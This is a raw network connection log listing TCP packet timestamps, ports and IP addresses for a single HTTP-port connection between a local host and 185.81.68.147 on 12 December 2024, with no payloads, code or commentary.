Dec 12, 2024 16:48:43.173578024 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.173707008 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.173851013 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.175952911 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.176135063 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.176270008 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.178339958 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.178541899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.179667950 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.180926085 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.180972099 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.183233976 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.183290005 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.184292078 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.185664892 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.185717106 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.185724020 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.185751915 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.188019037 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.188169956 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.188224077 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.190325022 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.190435886 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.190496922 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.192689896 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.192781925 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.192842007 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.195152998 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.195276022 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.195666075 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.197518110 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.197581053 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.197621107 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.199903011 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.200010061 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.200051069 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.202328920 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.202398062 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.202440977 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.204685926 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.204807997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.204849958 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.207041025 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.207148075 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.207190037 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.209438086 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.209536076 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.209583998 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.211847067 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.211913109 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.211956024 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.214241982 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.259737015 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.283242941 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.283373117 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.283514023 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.284120083 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.284257889 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.284359932 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.286118031 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.286248922 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.286307096 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.288099051 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.288144112 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.288249016 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.290014029 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.290131092 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.290185928 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.291949034 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.292108059 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.292203903 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.293843031 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.293962955 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.294022083 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.295763969 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.295905113 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.296003103 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.297784090 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.297904968 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.297982931 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.299374104 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.299438953 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.299506903 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.301196098 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.301290989 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.301395893 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.302979946 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.303006887 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.303056955 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.304743052 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.304826975 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.304940939 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.306577921 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.306631088 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.306740999 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.308275938 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.308379889 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.308497906 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.310067892 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.310081959 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.310152054 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.311728954 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.311816931 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.311927080 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.313345909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.313400030 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.313456059 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.315085888 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.315109968 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.315164089 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.316703081 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.316756964 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.316860914 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.318263054 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.318309069 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.318373919 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.319884062 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.319974899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.320079088 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.321516037 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.321614027 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.321717978 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.323062897 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.323167086 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.323216915 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.324635983 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.324729919 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.324837923 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.326255083 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.326303959 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.326358080 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.327837944 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.327997923 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.328118086 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.329428911 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.329536915 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.329633951 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.330878973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.331001997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.331052065 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.332434893 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.332477093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.332525015 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.333945990 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.333978891 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.334038973 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.335441113 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.335541010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.335587978 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.336947918 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.337052107 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.337151051 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.338424921 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.338638067 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.338685036 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.339960098 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.340008020 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.340050936 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.341450930 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.341559887 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.341662884 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.342947006 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.343050003 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.343101978 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.344459057 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.344516993 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.344620943 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.345988989 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.346085072 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.346137047 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.347420931 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.347568989 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.347619057 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.348936081 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.349426031 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.349538088 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.350428104 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.350497007 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.350543976 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.351937056 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.352051020 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.352099895 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.353437901 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.353566885 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.353667974 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.354976892 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.355550051 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.355597019 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.356458902 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.356559992 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.356659889 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.357959986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.357990980 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.358042002 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.359472990 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.359505892 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.359546900 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.360981941 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.361049891 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.361150026 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.362454891 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.362543106 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.362593889 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.363967896 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.363996029 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.364062071 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.365443945 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.365497112 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.365595102 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.366961002 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.367012024 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.367068052 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.368443012 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.415978909 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.475858927 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.475961924 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.476118088 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.476344109 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.476475954 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.476582050 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.477433920 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.477638960 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.477742910 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.478554964 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.478660107 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.478760958 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.479685068 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.479731083 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.479834080 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.480782986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.480839968 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.480938911 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.481798887 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.481897116 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.482006073 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.482920885 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.483083010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.483185053 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.483946085 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.483989000 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.484086037 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.484987020 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.485069036 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.485161066 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.486028910 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.486176014 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.486267090 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.487195969 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.487354040 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.487449884 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.488157034 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.488214016 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.488250971 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.489156008 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.489269972 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.489309072 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.490190983 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.490307093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.490354061 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.491159916 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.491266966 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.491364956 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.492162943 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.492224932 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.492275000 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.493226051 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.493364096 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.493402958 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.494276047 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.494349003 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.494388103 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.495270014 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.495532036 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.495634079 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.496259928 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.496346951 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.496388912 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.497282982 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.497478962 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.497530937 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.498296022 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.498537064 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.498596907 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.499336958 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.499407053 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.499501944 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.500284910 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.500397921 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.500494003 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.501329899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.501353025 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.501390934 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.502336025 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.502434015 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.502474070 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.503375053 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.503542900 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.503640890 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.504545927 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.504705906 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.504755020 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.505388975 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.505614996 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.505662918 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.506447077 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.506494045 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.506546974 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.507430077 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.507448912 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.507572889 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.508399963 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.508550882 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.508662939 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.509445906 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.509546995 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.509598970 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.510435104 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.510606050 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.510657072 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.511471033 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.511598110 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.511702061 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.512479067 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.512610912 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.512708902 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.513549089 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.513639927 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.513741970 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.514559031 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.514662981 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.514707088 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.515516996 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.515644073 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.515742064 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.516525984 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.516679049 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.516777039 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:43.517549992 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.517635107 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:43.517682076 CET	49946	80	192.168.2.10	185.81.68.147
